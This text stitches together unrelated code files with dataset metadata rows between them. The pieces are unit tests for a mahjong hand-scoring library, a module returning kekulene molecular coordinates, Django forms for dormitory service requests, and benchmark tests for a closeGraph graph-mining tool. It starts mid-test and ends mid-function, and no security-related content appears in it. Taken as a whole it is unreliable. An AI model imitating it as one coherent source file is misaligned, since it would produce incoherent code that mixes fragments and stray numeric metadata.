self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 2
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Koutsu(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.suuankou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_no_suuankou_ron(self): # 四暗刻
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 3).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 4).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 2
self.player.agari_tile = Tile(Suit.MANZU.value, 4)
ron = True
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Koutsu(
self.player, self.stack, machi_tiles, self.bakaze, ron)
self.assertEqual(yaku_types.suuankou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_suuankou_tanki(self): # 四暗刻単騎
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 3).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 4).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 1
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Koutsu(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.suuankou(), True)
self.assertEqual(yaku_types.total_yaku, ['suuankou tanki'])
self.assertEqual(yaku_types.total_han, [26])
def test_suuankou(self): # 四暗刻
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 3).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 4).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 2
self.player.agari_tile = Tile(Suit.MANZU.value, 4)
ron = False # 自摸
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Koutsu(
self.player, self.stack, machi_tiles, self.bakaze, ron)
self.assertEqual(yaku_types.suuankou(), True)
self.assertEqual(yaku_types.total_yaku, ['suuankou'])
self.assertEqual(yaku_types.total_han, [13])
def test_no_suukantsu(self): # 四槓子
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 2).index] += 3
naki_tile = Tile(Suit.MANZU.value, 2)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.DAMINKAN, naki_tile,
[Tile(Suit.MANZU.value, 2) for i in range(1, 5)]))
naki_tile = Tile(Suit.MANZU.value, 3)
naki_tile.owner = 0
self.player.kabe.append(
Huro(Naki.ANKAN, naki_tile,
[Tile(Suit.MANZU.value, 3) for i in range(1, 5)]))
naki_tile = Tile(Suit.MANZU.value, 7)
naki_tile.owner = 0
self.player.kabe.append(
Huro(Naki.CHAKAN, naki_tile,
[Tile(Suit.MANZU.value, 7) for i in range(1, 5)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Koutsu(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.suukantsu(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_suukantsu(self): # 四槓子
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
naki_tile = Tile(Suit.MANZU.value, 2)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.DAMINKAN, naki_tile,
[Tile(Suit.MANZU.value, 2) for i in range(1, 5)]))
naki_tile = Tile(Suit.MANZU.value, 3)
naki_tile.owner = 0
self.player.kabe.append(
Huro(Naki.ANKAN, naki_tile,
[Tile(Suit.MANZU.value, 3) for i in range(1, 5)]))
naki_tile = Tile(Suit.MANZU.value, 7)
naki_tile.owner = 0
self.player.kabe.append(
Huro(Naki.CHAKAN, naki_tile,
[Tile(Suit.MANZU.value, 7) for i in range(1, 5)]))
naki_tile = Tile(Suit.PINZU.value, 7)
naki_tile.owner = 3
self.player.kabe.append(
Huro(Naki.DAMINKAN, naki_tile,
[Tile(Suit.PINZU.value, 7) for i in range(1, 5)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Koutsu(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.suukantsu(), True)
self.assertEqual(yaku_types.total_yaku, ['suukantsu'])
self.assertEqual(yaku_types.total_han, [13])
def test_no_sanankou(self): # 三暗刻
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 4).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 5).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 6).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 1
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Koutsu(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.sanankou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_no_sanankou_ron(self): # 三暗刻
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 5).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 6).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 7).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 4).index] += 2
self.player.agari_tile = Tile(Suit.PINZU.value, 4)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Koutsu(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.sanankou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_sanankou(self): # 三暗刻
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 3).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 4).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 5).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 6).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 1
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Koutsu(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.sanankou(), True)
self.assertEqual(yaku_types.total_yaku, ['sanankou'])
self.assertEqual(yaku_types.total_han, [2])
def test_no_sankantsu(self): # 三槓子
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 2).index] += 3
naki_tile = Tile(Suit.MANZU.value, 2)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.DAMINKAN, naki_tile,
[Tile(Suit.MANZU.value, 2) for i in range(1, 5)]))
naki_tile = Tile(Suit.MANZU.value, 3)
naki_tile.owner = 0
self.player.kabe.append(
Huro(Naki.ANKAN, naki_tile,
[Tile(Suit.MANZU.value, 3) for i in range(1, 5)]))
naki_tile = Tile(Suit.MANZU.value, 7)
naki_tile.owner = 3
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.MANZU.value, 7) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Koutsu(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.sankantsu(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_sankantsu(self): # 三槓子
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 2).index] += 3
naki_tile = Tile(Suit.MANZU.value, 2)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.DAMINKAN, naki_tile,
[Tile(Suit.MANZU.value, 2) for i in range(1, 5)]))
naki_tile = Tile(Suit.MANZU.value, 3)
naki_tile.owner = 0
self.player.kabe.append(
Huro(Naki.ANKAN, naki_tile,
[Tile(Suit.MANZU.value, 3) for i in range(1, 5)]))
naki_tile = Tile(Suit.MANZU.value, 7)
naki_tile.owner = 0
self.player.kabe.append(
Huro(Naki.CHAKAN, naki_tile,
[Tile(Suit.MANZU.value, 7) for i in range(1, 5)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Koutsu(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.sankantsu(), True)
self.assertEqual(yaku_types.total_yaku, ['sankantsu'])
self.assertEqual(yaku_types.total_han, [2])
class TestSanshoku(unittest.TestCase):
def setUp(self):
self.player = Player('test', 0)
self.stack = Stack()
self.bakaze = Jihai.TON
def test_no_sanshoku_doukou(self): # 三色同刻
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.hand[Tile(Suit.PINZU.value, 2).index] += 3
for i in range(7, 10):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 2
naki_tile = Tile(Suit.MANZU.value, 2)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.MANZU.value, 2) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 2)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Sanshoku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.sanshoku_doukou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_sanshoku_doukou(self): # 三色同刻
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 2
self.player.hand[Tile(Suit.PINZU.value, 2).index] += 3
for i in range(7, 10):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 2
naki_tile = Tile(Suit.MANZU.value, 2)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.MANZU.value, 2) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 2)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Sanshoku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.sanshoku_doukou(), True)
self.assertEqual(yaku_types.total_yaku, ['sanshoku_doukou'])
self.assertEqual(yaku_types.total_han, [2])
def test_no_sanshoku_doujun(self): # 三色同順
for i in range(4, 7):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, i).index] += 1
self.player.hand[Tile(Suit.PINZU.value, i + 1).index] += 1
for i in range(7, 10):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
self.player.agari_tile = Tile(Suit.PINZU.value, 9)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Sanshoku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.sanshoku_doujun(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_sanshoku_doujun_closed(self): # 三色同順
for i in range(4, 7):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, i).index] += 1
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
for i in range(7, 10):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
self.player.agari_tile = Tile(Suit.PINZU.value, 9)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Sanshoku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.sanshoku_doujun(), True)
self.assertEqual(yaku_types.total_yaku, ['sanshoku_doujun'])
self.assertEqual(yaku_types.total_han, [2])
def test_sanshoku_doujun_opened(self): # 三色同順
for i in range(4, 7):
self.player.hand[Tile(Suit.SOUZU.value, i).index] += 1
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
for i in range(7, 10):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
naki_tile = Tile(Suit.MANZU.value, 4)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.CHII, naki_tile,
[Tile(Suit.MANZU.value, i) for i in range(4, 7)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 9)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Sanshoku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.sanshoku_doujun(), True)
self.assertEqual(yaku_types.total_yaku, ['sanshoku_doujun'])
self.assertEqual(yaku_types.total_han, [1])
class TestSomete(unittest.TestCase):
def setUp(self):
self.player = Player('test', 0)
self.stack = Stack()
self.bakaze = Jihai.TON
def test_no_chiniisou(self): # 清一色
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
self.player.agari_tile = Tile(Suit.SOUZU.value, 1)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Somete(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chiniisou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_chiniisou_closed(self): # 清一色
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
self.player.agari_tile = Tile(Suit.SOUZU.value, 1)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Somete(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chiniisou(), True)
self.assertEqual(yaku_types.total_yaku, ['chiniisou'])
self.assertEqual(yaku_types.total_han, [6])
def test_chiniisou_opened(self): # 清一色
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
naki_tile = Tile(Suit.SOUZU.value, 8)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.SOUZU.value, 8) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 1)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Somete(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chiniisou(), True)
self.assertEqual(yaku_types.total_yaku, ['chiniisou'])
self.assertEqual(yaku_types.total_han, [5])
def test_no_honiisou(self): # 混一色
self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 4).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
self.player.agari_tile = Tile(Suit.SOUZU.value, 1)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Somete(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.honiisou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_honiisou_closed(self): # 混一色
self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
self.player.agari_tile = Tile(Suit.SOUZU.value, 1)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Somete(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.honiisou(), True)
self.assertEqual(yaku_types.total_yaku, ['honiisou'])
self.assertEqual(yaku_types.total_han, [3])
def test_honiisou_opened(self): # 混一色
self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 1)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Somete(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.honiisou(), True)
self.assertEqual(yaku_types.total_yaku, ['honiisou'])
self.assertEqual(yaku_types.total_han, [2])
| 44.794872 | 79 | 0.6284 | 10,494 | 75,121 | 4.39089 | 0.018296 | 0.16841 | 0.137636 | 0.146881 | 0.972395 | 0.972308 | 0.970854 | 0.95347 | 0.946113 | 0.938062 | 0 | 0.018708 | 0.230082 | 75,121 | 1,676 | 80 | 44.821599 | 0.777979 | 0.005418 | 0 | 0.848962 | 0 | 0 | 0.006981 | 0 | 0 | 0 | 0 | 0 | 0.165354 | 1 | 0.06514 | false | 0 | 0.004295 | 0 | 0.075161 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c0401c238b618fac336fbf90718a073e1c2f560e | 4,178 | py | Python | lib/systems/kekulene.py | pulsar-chem/BPModule | f8e64e04fdb01947708f098e833600c459c2ff0e | [
"BSD-3-Clause"
] | null | null | null | lib/systems/kekulene.py | pulsar-chem/BPModule | f8e64e04fdb01947708f098e833600c459c2ff0e | [
"BSD-3-Clause"
] | null | null | null | lib/systems/kekulene.py | pulsar-chem/BPModule | f8e64e04fdb01947708f098e833600c459c2ff0e | [
"BSD-3-Clause"
] | null | null | null | import pulsar as psr
def load_ref_system():
""" Returns kekulene as found in the IQMol fragment library.
All credit to https://github.com/nutjunkie/IQmol
"""
return psr.make_system("""
C 2.58641 1.49327 0.00000
C 2.58641 -1.49327 0.00000
C 0.00000 2.98653 0.00000
C 3.77204 0.72177 0.00000
C 2.51109 2.90580 0.00000
C 3.77204 -0.72177 0.00000
C 1.26095 3.62757 0.00000
C -0.00000 -2.98653 -0.00000
C -2.58641 1.49327 -0.00000
C 2.51109 -2.90580 0.00000
C -1.26095 3.62757 -0.00000
C 4.97852 1.43520 0.00000
C 3.73219 3.59392 0.00000
C -2.58641 -1.49327 -0.00000
C 1.26095 -3.62757 0.00000
C -2.51109 2.90580 -0.00000
C 4.97852 -1.43520 0.00000
C 1.24634 5.02913 0.00000
C 4.94467 2.85481 0.00000
C -1.26095 -3.62757 -0.00000
C -3.77204 0.72177 -0.00000
C 3.73219 -3.59392 0.00000
C -1.24634 5.02913 0.00000
C 6.17759 0.70266 0.00000
C 3.69732 4.99862 0.00000
C -2.51109 -2.90580 -0.00000
C -3.77204 -0.72177 -0.00000
C 4.94467 -2.85481 0.00000
C 0.00000 5.70962 0.00000
C 6.17759 -0.70266 0.00000
C 2.48027 5.70128 0.00000
C 1.24634 -5.02913 -0.00000
C -3.73219 3.59392 -0.00000
C -1.24634 -5.02913 -0.00000
C -4.97852 1.43520 -0.00000
C 3.69732 -4.99862 0.00000
C -2.48027 5.70128 -0.00000
C -3.73219 -3.59392 -0.00000
C -4.97852 -1.43520 -0.00000
C -0.00000 -5.70962 -0.00000
C -4.94467 2.85481 -0.00000
C 2.48027 -5.70128 0.00000
C -3.69732 4.99862 -0.00000
C -4.94467 -2.85481 -0.00000
C -2.48027 -5.70128 -0.00000
C -6.17759 0.70266 -0.00000
C -3.69732 -4.99862 -0.00000
C -6.17759 -0.70266 -0.00000
H 1.65272 0.95420 0.00000
H 1.65272 -0.95420 0.00000
H 0.00000 1.90840 0.00000
H -0.00000 -1.90840 -0.00000
H -1.65272 0.95420 -0.00000
H -1.65272 -0.95420 -0.00000
H 5.88815 3.39953 0.00000
H 7.13332 1.22331 0.00000
H 4.62608 5.56598 0.00000
H 5.88815 -3.39953 0.00000
H 0.00000 6.79905 0.00000
H 7.13332 -1.22331 0.00000
H 2.50724 6.78929 0.00000
H 4.62608 -5.56598 0.00000
H -2.50724 6.78929 -0.00000
H -0.00000 -6.79905 -0.00000
H -5.88815 3.39953 -0.00000
H 2.50724 -6.78929 0.00000
H -4.62608 5.56598 -0.00000
H -5.88815 -3.39953 -0.00000
H -2.50724 -6.78929 -0.00000
H -7.13332 1.22331 -0.00000
H -4.62608 -5.56598 -0.00000
H -7.13332 -1.22331 -0.00000
""")
| 52.225 | 64 | 0.361178 | 533 | 4,178 | 2.825516 | 0.135084 | 0.318725 | 0.21846 | 0.063745 | 0.908367 | 0.908367 | 0.908367 | 0.908367 | 0.908367 | 0.879814 | 0 | 0.697524 | 0.55529 | 4,178 | 79 | 65 | 52.886076 | 0.113025 | 0.025132 | 0 | 0 | 0 | 0 | 0.979275 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013158 | true | 0 | 0.013158 | 0 | 0.039474 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
c0507b05aebcab634f0e20ca528ec30d2272a81d | 3,449 | py | Python | core/forms.py | hari01584/project__UNIAutoMate__MakeAThon3077 | de3f32a13dc12587ed37947d37ee918c8fa43e80 | [
"MIT"
] | 3 | 2021-03-08T16:29:20.000Z | 2022-03-01T10:07:52.000Z | core/forms.py | hari01584/project__UNIAutoMate__MakeAThon3077 | de3f32a13dc12587ed37947d37ee918c8fa43e80 | [
"MIT"
] | null | null | null | core/forms.py | hari01584/project__UNIAutoMate__MakeAThon3077 | de3f32a13dc12587ed37947d37ee918c8fa43e80 | [
"MIT"
] | 3 | 2021-03-05T16:58:54.000Z | 2022-03-01T10:07:56.000Z | # -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""
from django import forms
from django.forms import ModelForm
from core.models import roomRequest, complains, medical, laundaryRequest
class RoomCleaningForm(forms.ModelForm):
name = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
roomNo = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
PhoneNo = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
TimeCleaning = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
class Meta:
model = roomRequest
fields = ('name', 'roomNo', 'PhoneNo', 'TimeCleaning')
class medicalForm(forms.ModelForm):
name = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
roomno = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
phoneno = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
date = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
problem = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
time = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
class Meta:
model = medical
fields = ('name', 'roomno', 'phoneno', 'date', 'problem', 'time')
class ComplaintForm(forms.ModelForm):
name = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
roomno = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
phoneno = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
complaint = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
class Meta:
model = complains
fields = ('name', 'roomno', 'phoneno', 'complaint')
class LaundaryForm(forms.ModelForm):
name = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
roomno = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
phoneno = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
time = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
class Meta:
model = laundaryRequest
fields = ('name', 'roomno', 'phoneno', 'time')
| 22.993333 | 73 | 0.467092 | 260 | 3,449 | 6.196154 | 0.161538 | 0.156425 | 0.223464 | 0.27933 | 0.731223 | 0.731223 | 0.731223 | 0.731223 | 0.731223 | 0.697083 | 0 | 0.002467 | 0.412293 | 3,449 | 149 | 74 | 23.147651 | 0.792304 | 0.018556 | 0 | 0.692913 | 0 | 0 | 0.122594 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.023622 | 0 | 0.228346 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c050c941b2992979d3ec2a94c547a3191fb6c698 | 15,032 | py | Python | gspan_mining/benchmarkTests.py | NaazS03/TestingCloseGraph | 60666b4da4e0ec43ce53290336a3266c9d01d366 | [
"MIT"
] | null | null | null | gspan_mining/benchmarkTests.py | NaazS03/TestingCloseGraph | 60666b4da4e0ec43ce53290336a3266c9d01d366 | [
"MIT"
] | null | null | null | gspan_mining/benchmarkTests.py | NaazS03/TestingCloseGraph | 60666b4da4e0ec43ce53290336a3266c9d01d366 | [
"MIT"
] | null | null | null | import unittest
from closegraph import closeGraph
class CompoundBenchmarkTests(unittest.TestCase):
"""
Before running a benchmark test
make sure that @profile is not commented out in gSpan if memory usage info is desired
@profile lets the memory profiler work
"""
# The test below took longer than 12 hours to complete. Results unknown
# def test_compound_min_graph_size_2_support_3_percent(self):
# graph_dataset_size = 422
#
# file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
# supp = graph_dataset_size * 0.03
# min_size_graph = 2
# gs = gSpan(
# database_file_name=file_name,
# min_support=supp,
# min_num_vertices=min_size_graph
# )
# gs.run()
def test_compound_min_graph_size_2_support_4_percent(self):
graph_dataset_size = 422
file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
supp = graph_dataset_size * 0.04
min_size_graph = 2
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
cg.graph_dataset_stats()
def test_compound_min_graph_size_2_support_5_percent(self):
graph_dataset_size = 422
file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
supp = graph_dataset_size * 0.05
min_size_graph = 2
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
cg.graph_dataset_stats()
def test_compound_min_graph_size_2_support_6_percent(self):
graph_dataset_size = 422
file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
supp = graph_dataset_size * 0.06
min_size_graph = 2
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
cg.graph_dataset_stats()
def test_compound_min_graph_size_2_support_7_percent(self):
graph_dataset_size = 422
file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
supp = graph_dataset_size * 0.07
min_size_graph = 2
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
cg.graph_dataset_stats()
def test_compound_min_graph_size_2_support_8_percent(self):
graph_dataset_size = 422
